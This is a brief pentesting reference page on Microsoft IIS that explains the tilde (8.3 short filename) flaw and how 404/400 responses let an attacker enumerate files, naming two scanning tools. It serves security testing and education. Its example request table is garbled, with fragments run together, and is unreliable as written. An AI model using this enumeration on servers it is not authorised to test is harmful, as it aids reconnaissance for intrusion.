Microsoft IIS Back

Security related information and use within the scope of pentesting


Internet Information Server is a extensible web server created by Microsoft for use within the NT (3.1 - WS 2016) family. It supports different protocols like HTTP 1/2, TLS, FTP/FTPS, SMTP and NNTP (Network News Transfer Protocol). ISS implements also different authentication mechanisms (like HTTP basic authentication) [1].

Tilde Vulnerability

Microsoft invented a filename convention called 8.3 or SFN (short filename) to support legacy programs (e.g. MS-DOS) accessing a file with a long filename. Creating a file, also creates a SFN based copy (look it up via dir /x) considering the following rules:

example.txt => EXAMPLE.TXT (<= 8 chars; convert to uppercase)
if-filename-longer-than-8-chars.txt => IF-FIL~1.txt (first 6 chars + "~" + incrementing number)

This manner can be used in combination with IIS's behavior when requesting an existent vs. a nonexistent file (HTTP status-code 200/404/400) to enumerate files on the server. Example:*~1*/.aspx                   =>  404: valid (one/more files available with SFN)*~1*/.aspx                  =>  404: valid (starts with "A")*~1*/.aspx                 =>  400: invalid (the second letter is not "A")*~1*/.aspx                 =>  404: valid (the second letter is "C")               =>  400: invalid (it's not a folder and it has an extension)     =>  404: valid (extension has 3 or more chars; %3f = ? [URL-encoded])

Multiple tools are automating the process of enumeration: IIS-ShortName-Scanner, tilde_enum (this script tries to go further).

Tool #1 (Java):
Tool #2: